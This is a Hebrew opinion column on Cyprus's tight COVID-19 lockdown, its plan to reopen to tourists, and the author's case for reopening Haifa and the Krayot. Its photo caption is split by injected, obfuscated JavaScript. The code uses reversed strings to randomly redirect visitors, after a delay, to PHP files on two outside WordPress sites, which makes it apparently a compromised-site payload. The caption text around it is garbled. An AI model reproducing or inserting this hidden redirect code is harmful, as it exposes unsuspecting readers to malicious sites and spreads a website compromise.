fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מודל הקורונה הקפריסאי

בקפריסין הטילו סגר מאוד לוחץ. בן אדם שמבקש לצאת לשעתיים מהבית, מיידע את השלטונות באס אם אס, ולאחר מכן רחפן עוקב אחריו, עד לחזרתו הביתה
על קפריסין וקורונה וערי הקריות - הטור של צ'רקס | צילום: shutterstock
על קפריסין וקורונה וערי הקריות - הטור של צ'רקס | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

על קפריסין וקורונה וערי הקריות – הטור של צ'רקס

צלצלתי לחבר בקפריסין לשאול בשלומו. אמרתי לו שאני מתגעגע למועדונים ולמוזיקה. הוא צחק וענה שגם הוא מתגעגע לאותם דברים.

בקפריסין הקטסטרופה הכלכלית עלולה להיות הרבה יותר גדולה מאשר אצלנו. המדינה כולה בנויה על ענף התיירות. בעצם קפריסין דומה לאילת שלנו. היות שכך, החליטו שם על סגר מאוד לוחץ, אפילו יותר מאצלנו. בן אדם שמבקש לצאת לשעתיים מהבית, מיידע את השלטונות באס אם אס, ולאחר מכן רחפן עוקב אחריו, עד לחזרתו הביתה.

"האח הגדול" עובד בקפריסין שעות נוספות מתוך הנחה שבחודש מאי הם ישחררו ויתחילו להביא תיירים. הם מעריכים שיוכלו להביא בסוף מאי תחילת יוני תיירים מגרמניה, דנמרק ואפילו מישראל.

תייר שיגיע לקפריסין יעבור בארץ המוצא בהמתנה להמראה, בנוסף לבדיקה ביטחונית גם בדיקה רפואית בהערכה שתוך דקות ידווח לגבי מצבו הרפואי.

בנושא הקורונה, הקפריסאים מעריכים שזה יתחיל לאט, אבל בסופו של דבר, בחודשי יולי-אוגוסט זה יהיה מנוף להצלת הכלכלה הקורסת שלהם.

האם זה יצליח, האם תיירים ייענו לאתגר הזה, קשה לדעת, אבל אין להם ברירה אחרת, והם מעריכים שם שככל שיתחילו מוקדם, כך יוטב מצבם, והם ילמדו את הנושא תוך כדי תנועה.

קפריסין היא אי קטן, חצי ממדינת ישראל, 900 אלף תושבים שקיבלו בשנה שעברה 2.8 מיליון תיירים. אין להם הרבה ברירות והם מקווים לשינוי המיוחל בחודשי הקיץ. אני מאחל להם בכל ליבי שיצליחו ויהוו דוגמה לעוד מקומות בעולם.

ומה אצלנו?

מטבע הדברים אני שואל מדוע לא לפתוח יותר את חיפה וערי המפרץ ובמיוחד את אזורי התעשייה. תושבי חיפה והקריות התנהגו למופת, יש מעט מקרים יחסית של קורונה, ואפשר להחזיר את הפעילות הכלכלית.

הייתי בדואר בחול המועד, בסניף בקרית ביאליק דרום. האנשים התנהגו למופת, כולם עם מסכות חיכו בתור, תוך שמירת מרחק. במשך חצי שעה הם נכנסו אחד אחד פנימה וזכו בשירות אדיב.

אפשר ליישם את זה על חנויות קטנות ועל עוד עסקים קטנים ובינוניים. הציבור ממושמע וחשוב להניע את המשק במשמעת עצמית לטובת כולנו, ויפה שעה אחת קודם.

אהבתם את הטור של צ'רקס על קפריסין וקורונה וערי הקריות? טורים נוספים כאן

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות